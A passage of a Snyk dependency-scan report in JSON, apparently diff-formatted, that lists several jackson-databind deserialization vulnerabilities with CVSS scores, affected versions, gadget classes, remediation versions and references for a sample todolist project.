"cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.016713Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:19.015843Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.132894Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. Mishandles the interaction between serialization gadgets and typing, related to:\r\n\r\n* `com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig` (aka `ibatis-sqlmap`)\r\n* `br.com.anteros.dbcp.AnterosDBCPConfig` (aka `anteros-core`)\r\n* `org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig` (aka shaded `hikari-config`)\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.7.9.7, 2.8.11.6, 2.9.10.4 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/9f4e97019fb0dd836533d0b6198c88787e235ae2)\n- [Github Issue #1](https://github.com/FasterXML/jackson-databind/issues/2634)\n- [GitHub Issue #2](https://github.com/FasterXML/jackson-databind/issues/2631)\n- [GitHub PoC](https://github.com/fairyming/CVE-2020-9548)\n", + "epssDetails": { + "percentile": "0.79604", + "probability": "0.00652", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-9546", + "CVE-2020-9547", + "CVE-2020-9548" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-5p34-5m6p-p58g", + "GHSA-p43x-xfjf-5jhr", + "GHSA-q93h-jc49-78gg" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-02T10:29:31.222015Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T05:18:36Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T05:18:36Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.132894Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-559106", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "credit": [ + "Pedro Sampaio" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.3", + "2.8.11.5", + "2.9.10.3" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2462", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2469", + "title": "GitHub Issue" + }, + { + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892", + "title": "RedHat Bugzilla" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "critical", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 9.8, + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:59.772859Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "critical", + "baseScore": 9.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:48.813035Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:53:54.500842Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data due to an incomplete black list (incomplete fix for [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507)). \r\nIt doesn't block `common-configuration` JNDI classes `org.apache.commons.configuration.JNDIConfiguration` and `org.apache.commons.configuration2.JNDIConfiguration`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.8.11.5, 2.9.10.3 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/41b7f9b90149e9d44a65a8261a8deedc7186f6af)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2462)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2469)\n- [RedHat Bugzilla](https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-14892)\n", + "epssDetails": { + "percentile": "0.73523", + "probability": "0.00392", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14892", + "CVE-2019-14893" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cf6r-3wgc-h863", + "GHSA-qmqc-x3r4-6v39" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-03T08:13:33.357434Z", + "functions_new": [ + { + "version": [ + "[,2.6.7.3)", + "[2.8.0,2.8.11.5)", + "[2.9.0,2.9.10.3)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-02T17:09:34Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-02T17:09:34Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.500842Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560762", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2660", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVE's Blog" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-10673", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:58:45.907430Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:14.029596Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:50.167932Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `com.caucho.config.types.ResourceRef` (aka `caucho-quercus`).\r\n\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/1645efbd392989cf015f459a91c999e59c921b15)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2660)\n- [On Jackson CVE's Blog](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-10673)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10673" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-fqwf-pjwf-7vqv" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T14:36:02.644920Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:21Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:21Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:50.167932Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-560766", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d", + "title": "GitHub Commit (Master)" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2659", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "On Jackson CVEs: Don’t Panic" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:56:35.299190Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.8, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:25.975313Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:53.920721Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.aries.transaction.jms.internal.XaPooledConnectionFactory` (aka `aries.transaction.jms`). \r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.4 or higher.\n## References\n- [GitHub Commit (Master)](https://github.com/FasterXML/jackson-databind/commit/592872f4235c7f2a3280725278da55544032f72d)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2659)\n- [On Jackson CVEs: Don’t Panic](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.81511", + "probability": "0.00775", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-10672" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-95cm-88f5-f2c7" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-03-19T15:03:20.847507Z", + "functions_new": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-03-18T22:56:24Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-03-18T22:56:24Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:53.920721Z", + "socialTrendAlert": false, + "packagePopularityRank": 99, + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "isPinnable": false, + "isRuntime": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5", + "severityWithCritical": "high" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-561362", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.0.0,2.6.7.4)", + "[2.7.0,2.7.9.7)", + "[2.8.0,2.8.11.6)", + "[2.9.0,2.9.10.4)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.7.9.7", + "2.8.11.6", + "2.9.10.4" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.0.0,2.9.10.4)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2642", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.8, + "modificationTime": "2024-03-11T09:50:19.998455Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.582959Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", 